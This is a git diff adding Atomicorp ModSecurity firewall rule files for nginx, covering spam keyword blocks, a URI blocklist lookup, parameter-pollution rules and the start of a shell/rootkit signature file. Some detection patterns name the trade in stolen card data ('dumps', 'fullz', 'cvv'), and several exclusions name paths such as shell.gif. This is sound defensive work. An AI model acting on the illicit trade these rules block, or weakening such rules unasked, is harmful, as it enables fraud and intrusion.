+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/ "(?:free|discount)[ -_.,\"\'\|]?anti[ -_.,\"\'\|]?(?:virus|(?:spy|mal)ware)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300080,rev:5,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Free antivirus/spyware Link/Content',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+#Rule 300080
+SecRule ARGS|!ARGS:/domain/|!ARGS:/^utm_/|!ARGS:/new_messages/|!ARGS:utm_term|!ARGS:/bigdescription/|!ARGS:/orgname/|!ARGS:/query/|!ARGS:/ticket/|!ARGS:/navcat/|!ARGS:/banned/|!ARGS:offer_article|!ARGS:action_name|!ARGS:ban_user|!ARGS:short_story|!ARGS:UserData|!ARGS:/process_chats/|!ARGS:embed|!ARGS:tmpl|!ARGS:business|!ARGS:/milestone/|!ARGS:/product_name/|!ARGS:/AD_ITEM/|!ARGS:/drug/|!ARGS:/^payer_/|!ARGS:/billing/|!ARGS:/casetrack/|!ARGS:block|!ARGS:imapuser|!ARGS:ban|!ARGS:/department/|!ARGS:redirect_to|!ARGS:p_profile_pictures|!ARGS:return|!ARGS:setting[banemail]|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/|!ARGS:/user_name/|!ARGS:/page_content/ "pick[ -_.,\"\'\|]?up[ -_.,\"\'\|]?your[ -_.,\"\'\|]?greeting[ -_.,\"\'\|]?card" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300060,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Spam/Malware Link/Content',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_ANTIVIRUS_SPAM
+############WOW/GOLD FARMING SPAM###########
+SecRule ARGS "@pm gold farm making make hour tip likes"         "id:353915,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333748,t:none,pass,nolog,noauditlog,skipAfter:END_WOW_SPAM"
+
+#Rule 300184
+SecRule ARGS "(?:gold[ -_.,\"\'\|](?:making|farmers)|game[ -_.,\"\'\|]tip[ -_.,\"\'\|]wow[ -_.,\"\'\|]gold|gold[ -_.,\"\'\|]an[ -_.,\"\'\|]hour[ -_.,\"\'\|]farm|farming[ -_.,\"\'\|]gold|runescape[ -_.,\"\'\|]?gold|buy (?:instagram|facebook|twitter) likes)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300184,rev:3,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible spam content',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_WOW_SPAM
+
+############ESSAY SPAM###########
+SecRule ARGS "@pm essay paper best term dissertations writing custom resume editing proofreading research video custom"         "id:333916,phase:2,t:none,t:urlDecodeUni,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333749,t:none,pass,nolog,noauditlog,skipAfter:END_ESSAY_SPAM"
+
+SecRule ARGS|!ARGS:/username/|!ARGS:oaparams|!ARGS:/password/ "(?:best (?:term|college) (?:papers|essays)|best essays|academic writing assistance for term papers|(?:custom|essay|resume|paper|book report|video|research paper|dissertation|book and report) (?:writ|edit)ing (?:website|service)|(?:proofreading|custom writing) services|custom (?:research papers|paper writing)|original custom research paper for you|essay editing|custom (?:paper|writing))" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300185,rev:4,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Essay spam content',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_ESSAY_SPAM
+
+
+
+
+############# GENERAL FORUM SPAM ###################
+SecRule ARGS "@pm dumps cvv verified unlimited ebay heinchuini@ymail.com fullz atm"         "id:333917,phase:2,t:none,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333750,t:none,pass,nolog,noauditlog,skipAfter:END_HACK_SPAM"
+
+SecRule ARGS "(?:fresh and verified and unlimited ebay|atm pin database|heinchuini@ymail.com|fullz and uk fullz|cvv\+full info|i sell dumps)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300188,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Illegal Activity Forum Spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_HACK_SPAM
+
+#Movies spam
+SecRule ARGS "@pm movies capital rapidshare hollywood"         "id:353918,phase:2,t:none,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333751,t:none,pass,nolog,noauditlog,skipAfter:END_MOVIES_SPAM"
+
+SecRule ARGS "(?:movies capital (?:has an|scam)|rapidshare premium link generator|huge collection of photos of hollywood stars)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300189,rev:3,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible Illegal Activity Forum Spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_MOVIES_SPAM
+
+SecRule ARGS "@streq unlimited"         "id:333919,phase:2,t:none,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333752,t:none,pass,nolog,noauditlog,skipAfter:END_HOSTING_SPAM"
+
+SecRule ARGS "business of unlimited reseller hosting" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300301,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Reseller spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+
+SecMarker END_HOSTING_SPAM
+
+SecRule ARGS "@pm visa fiance spouse spousal green"         "id:333920,phase:2,t:none,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333755,t:none,pass,nolog,noauditlog,skipAfter:END_VISA_SPAM"
+
+SecRule ARGS "(?:k(?:1|3) (?:fiancee?|spous(?:e|al)) (?:visa|green ?card)|k(?:1|2|3) visa)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300303,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible visa spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+
+SecMarker END_VISA_SPAM
+
+#job search spam
+#job search faster
+SecRule ARGS "@pm job search"         "id:333921,phase:2,t:none,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333756,t:none,pass,nolog,noauditlog,skipAfter:END_JOBS_SPAM"
+
+SecRule ARGS "(?:job search faster|find perfect jobs|free enterprise jobs)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300304,rev:1,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible job search spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+
+SecMarker END_JOBS_SPAM
+
+SecRule ARGS "@pm loan checking money cash"         "id:333922,phase:2,t:none,t:compressWhiteSpace,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333757,t:none,pass,nolog,noauditlog,skipAfter:END_LOAN_SPAM"
+
+SecRule ARGS "(?:second chance checking|pay ?day ?loan|money site url|cash[ -_.,\"\'\|]?advance)" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,t:compressWhitespace,id:300311,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Possible loan spam',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+
+SecMarker END_LOAN_SPAM
+
+SecRule REQUEST_URI "@pm result: ++++"         "id:333923,phase:2,t:none,pass,nolog,noauditlog,skip:1"
+        SecAction "phase:2,id:333758,t:none,pass,nolog,noauditlog,skipAfter:END_SPLIT_SPAM"
+
+SecRule REQUEST_URI "\+\+\+\+\+\+\+\+\+\+\+.{1,100}result\:" "phase:2,deny,log,auditlog,status:403,t:none,t:lowercase,id:301311,rev:2,severity:4,msg:'Atomicorp.com WAF AntiSpam Rules: Spam: Session Splitting Spam Attempt',logdata:' %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+
+SecMarker END_SPLIT_SPAM
+
+
+#All spam end
+
+
+
+
+
+
+
+
+
+
+
+
+#anti hotlinking
+# SecRule REQUEST_HEADERS:Referer #                "!@beginsWith %{request_headers.host}" #                phase:1,t:none,log,drop,chain
+#        SecRule REQUEST_FILENAME  "!\.(?:gif|png|jpe?g|ico)$" #                t:none,t:lowercase
+SecMarker END_SPAM
diff --git a/nginx-waf/31_asl_urispam.conf b/nginx-waf/31_asl_urispam.conf
new file mode 100644
index 0000000..bc43202
--- /dev/null
+++ b/nginx-waf/31_asl_urispam.conf
@@ -0,0 +1,66 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Anti Spam rules
+#
+# Created by Prometheus Global (http://www.prometheus-group.com)
+# Copyright 2005 - 2022 by Atomicorp, Inc. All rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+
+# Do not edit this file!
+# This file is generated and changes will be overwritten.
+#
+# If you need to make changes to the rules, please follow the procedure here:
+# http://www.atomicorp.com/wiki/index.php/Mod_security
+
+# Phase 2 rules
+# Rule 300000: Blacklist of referer spam hostnames
+
+
+
+SecRule SERVER_PORT "@streq 30000" "phase:1,id:339853,pass,t:none,nolog,noauditlog,skipAfter:END_SPAM_URI"
+
+#Skip SPAM rules if this is a not something to check for spam, like graphics, videos, CSS, ico, docs, etc.
+SecRule REQUEST_FILENAME "\.((m|j)pe?g4?|bmp|tiff?|p((p|g|b)m|n(g|m)|df|s)|gif|js|css|flv|ico|avi|w(m(?:v|a)|ebp)|mp(3|4)|cgm|svg|swf|og(m|v|x)|te?xt|doc|xls|od(?:t|s)|ppt|wbk)$" "phase:2,id:333938,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_SPAM_URI"
+
+#Concrete 5 editing bypass
+SecRule ARGS:ccm-edit-block-submit "^submit$"         "phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,id:333939,skipAfter:END_SPAM_URI"
+
+#Skip SPAM rules for admin applications and the like
+SecRule REQUEST_URI "(?:/(?:(?:i(?:nclude\.php?path=forum/editpost|mp/compose)|pr(?:o(?:duct_thumb|file)|eview_static_cgi)|callback|diagnostics|editsection|tickets)\.php|system/index\.php?s=.*c=(?:publish|edit)&m=new_entry$|workshops/register\.php|link(?:machine/linkmachine\.php|s/\?act=addsite)|(?:\?modulo=loja&action|update\.php?pageid)=|nav\.php\?nav=(?:moderate|addnews)|cgi-bin/mailinglist/mail\.cgi)|/(?:(?:s(?:itebuilder|hopadmin)|cms/resources/edit|hspc/pcc|node/add|vsadmin)/|w(?:p-(?:content/plugins|admin)/|izard/edit/html)|adm(?:in(?:istrator/)?|/))|\?(?:(?:p=admin_cms|task=edit|tab=admin[a-z]+)&|action=admin)|node/[0-9]+/edit|^/\?[sv]=|\?q=ckeditor|/secure/|/site-?admin/|/ndxz-studio/|/wp-admin/|/cms/|/file/ajax/|/members/editing/|/comment/reply/[0-9]+|/new/[0-9]+/confirm|/index\.php\?option=com_jreviews|/calendar/index\.php\?act=calendar&code=addnewevent)" "phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,id:333940,skipAfter:END_SPAM_URI"
+
+############ SPAMMY URLS ########################
+#
+SecRule ARGS "@pm http:// https:// @"         "id:333941,phase:2,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:compressWhiteSpace,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:353535,t:none,pass,nolog,noauditlog,skipAfter:END_SPAM_URI"
+
+#Check spam domain to see if its on the URIRBL list
+SecRule ARGS "https?\://(.*?)/"     "chain,log,auditlog,phase:2,severity:2,id:377777,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,capture,msg:'Atomicorp.com WAF Rules: Possible Spam Domain:  URIBL Match of Submitted Link Domain on urirbl.com blocklist. (Report False Positives to www.uribl.com)',logdata:'%{tx.domain}',setvar:tx.domain=%{tx.1}"
+SecRule TX:1 "@rbl multi.uribl.com" "capture,chain"
+SecRule TX:0 "(BLACK)"  t:none
+
+#Check spam domain to see if its on the URIRBL list
+#SecRule ARGS "@(.*?)" #    "chain,log,phase:2,id:377779,severity:2,rev:1,t:none,t:urlDecodeUni,t:lowercase,deny,capture,msg:'Atomicorp.com WAF Rules: Possible Spam Domain:  URIBL Match of Submitted Link Domain on urirbl.com blocklist.',logdata:'%{tx.domain}',setvar:tx.domain=%{tx.1}"
+#SecRule TX:1 "@rbl multi.uribl.com" "capture,chain"
+#SecRule TX:0 "(BLACK)"  t:none
+
+#All spam end
+SecMarker END_SPAM_URI
+
diff --git a/nginx-waf/45_asl_hpp.conf b/nginx-waf/45_asl_hpp.conf
new file mode 100644
index 0000000..7037f6e
--- /dev/null
+++ b/nginx-waf/45_asl_hpp.conf
@@ -0,0 +1,35 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Application Security Rules for modsec 2.x
+#
+# Copyright 2016 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
+# THE POSSIBILITY OF SUCH DAMAGE.
+#
+#---ASL-CONFIG-FILE---
+#
+
+#skip this for technologies that dont have HPP vulnerabilities
+
+#count arguments
+##SecRule ARGS_NAMES "\." "phase:2,id:381731,rev:'2',pass,nolog,noauditlog,setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'"
+
+##SecRule TX:/paramcounter_.*/ "@gt 1"  "msg:'HTTP Parameter Pollution (%{TX.1})',chain,phase:2,id:381723,rev:21,severity:'CRITICAL',deny,log,auditlog,status:403,logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}'"
+##SecRule MATCHED_VARS_NAMES "TX:paramcounter_(.*)" "capture"
+
diff --git a/nginx-waf/50_asl_rootkits.conf b/nginx-waf/50_asl_rootkits.conf
new file mode 100644
index 0000000..37a1966
--- /dev/null
+++ b/nginx-waf/50_asl_rootkits.conf
@@ -0,0 +1,345 @@
+SecDefaultAction "log,deny,auditlog,phase:2,status:403"
+SecRule REQUEST_FILENAME "homecounter\.php" "phase:2,id:95286,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390144,ctl:ruleRemovebyID=390145"
+
+SecRule REQUEST_FILENAME "moderation\.php" "phase:2,id:95287,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390148"
+
+SecRule REQUEST_FILENAME "/paadmin/file_manager\.php" "phase:2,id:95288,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/__utm\.gif" "phase:2,id:95289,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390144"
+
+SecRule REQUEST_FILENAME "/administrator/index\.php" "phase:2,id:95290,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/ota/admin/file_manager\.php" "phase:2,id:95291,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/admin/shop_file_manager\.php" "phase:2,id:95292,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/admin/file_manager\.php" "phase:2,id:95293,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/modules/mod_oneononechat/chatfiles/*" "phase:2,id:95294,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390147"
+
+SecRule REQUEST_FILENAME "/fud/adm/admbrowse\.php" "phase:2,id:95295,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/wp-cron\.php" "phase:2,id:95296,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390147"
+
+SecRule REQUEST_FILENAME "/admin/mods/easymod/easymod_install\.php" "phase:2,id:95297,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/autogallery/autogallery\.php" "phase:2,id:95298,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/alfresco/scripts/onload\.js" "phase:2,id:95299,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/assets/files/who/" "phase:2,id:95300,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390147"
+
+SecRule REQUEST_FILENAME "/forum/viewtopic\.php" "phase:2,id:95301,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/setup/" "phase:2,id:95302,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/administrator/index2\.php" "phase:2,id:95303,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/sales/soap\.php" "phase:2,id:95304,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/twg177/admin/" "phase:2,id:95305,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/images/smilies/" "phase:2,id:95306,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390148"
+
+SecRule REQUEST_FILENAME "/admin/dogen_display\.php" "phase:2,id:95307,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390801,ctl:ruleRemovebyID=390810,ctl:ruleRemovebyID=390811"
+
+SecRule REQUEST_FILENAME "/horde/themes/graphics/" "phase:2,id:95308,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390148,ctl:ruleRemovebyID=390800"
+
+SecRule REQUEST_FILENAME "/whois/quick\.php" "phase:2,id:95309,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390145"
+
+SecRule REQUEST_FILENAME "/ubbthreads\.php" "phase:2,id:95310,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390902"
+
+SecRule REQUEST_FILENAME "/administrator/" "phase:2,id:95311,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390902"
+
+SecRule REQUEST_FILENAME "^/img/logos_square/shell\.gif$" "phase:2,id:95312,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390148,ctl:ruleRemovebyID=390800"
+
+SecRule REQUEST_FILENAME "^/plugins/editors/jckeditor/plugins/jfilebrowser/images/icons/gif\.gif$" "phase:2,id:95313,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390147"
+
+SecRule REQUEST_FILENAME "/admin/templates/data_templates/data_templates\.php" "phase:2,id:95314,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390801,ctl:ruleRemovebyID=390810,ctl:ruleRemovebyID=390811"
+
+SecRule REQUEST_FILENAME "/nagios/cgi-bin/cmd\.cgi" "phase:2,id:95315,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390800"
+
+SecRule REQUEST_FILENAME "/tools_cron\.php" "phase:2,id:95316,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390904"
+
+SecRule REQUEST_FILENAME "/admin/layout/edit/" "phase:2,id:95317,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390801,ctl:ruleRemovebyID=390810,ctl:ruleRemovebyID=390811"
+
+SecRule REQUEST_FILENAME "/nagios/stylesheets/cmd\.css" "phase:2,id:95318,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390800"
+
+SecRule REQUEST_FILENAME "/adjs\.php" "phase:2,id:95319,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390144"
+
+SecRule REQUEST_FILENAME "/wp-admin/admin-ajax\.php" "phase:2,id:95320,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390801"
+
+SecRule REQUEST_FILENAME "/wp-admin/plugin-editor\.php" "phase:2,id:95321,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390801"
+
+SecRule REQUEST_FILENAME "/import\.php" "phase:2,id:95322,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390804"
+
+SecRule REQUEST_FILENAME "/terms\.php" "phase:2,id:95323,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/jfilebrowser/images/icons/gif\.gif" "phase:2,id:95324,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390147"
+
+SecRule REQUEST_FILENAME "/thumbs/" "phase:2,id:95325,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390147"
+
+SecRule REQUEST_FILENAME "/modules/mod_jw_ajaxnf/" "phase:2,id:95326,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390147"
+
+SecRule REQUEST_FILENAME "/wp-admin/nav-menus\.php" "phase:2,id:95327,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/themes/default/graphics/" "phase:2,id:95328,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390148,ctl:ruleRemovebyID=390800"
+
+SecRule REQUEST_FILENAME "/catalog/product/cache/" "phase:2,id:95329,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390148,ctl:ruleRemovebyID=390800"
+
+SecRule REQUEST_FILENAME "/installation/index\.php" "phase:2,id:95330,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390907"
+
+SecRule REQUEST_FILENAME "/wp-admin/theme-editor\.php" "phase:2,id:95331,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390801,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/wp-admin/post\.php" "phase:2,id:95332,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149,ctl:ruleRemovebyID=390801"
+
+SecRule REQUEST_FILENAME "/admin/scripts/shell\.js" "phase:2,id:95333,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390148"
+
+SecRule REQUEST_FILENAME "/timthumb\.php" "phase:2,id:95334,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390145"
+
+SecRule REQUEST_FILENAME "/connectors/workspace/packages-rest\.php" "phase:2,id:95335,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/admin/supporttickets\.php" "phase:2,id:95336,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/piwik\.php" "phase:2,id:95337,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390145"
+
+SecRule REQUEST_FILENAME "/pwiki\.php" "phase:2,id:95338,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390145"
+
+SecRule REQUEST_FILENAME "/json-api/cpanel" "phase:2,id:95339,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390904,ctl:ruleRemovebyID=390907"
+
+SecRule REQUEST_FILENAME "/picat/admin/" "phase:2,id:95340,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/viewticket\.php" "phase:2,id:95341,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/supporttickets\.php" "phase:2,id:95342,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/dokuwiki/doku\.php" "phase:2,id:95343,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/wp-admin/edit-comments\.php" "phase:2,id:95344,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/clientsservices\.php" "phase:2,id:95345,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+SecRule REQUEST_FILENAME "/wp-admin/admin-ajax\.php" "phase:2,id:95346,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390149"
+
+# http://www.atomicorp.com/
+# Atomicorp (Gotroot.com) ModSecurity rules
+# Known shells, remote toolkits, etc. signatures for modsec 2.x
+#
+# Copyright 2005-2023 by Atomicorp, Inc., all rights reserved.
+# Redistribution is strictly prohibited in any form, including whole or in part.
+#
+# Distribution of this work or derivative of this work in any form is
+# prohibited unless prior written permission is obtained from the
+# copyright holder.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AS IS
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
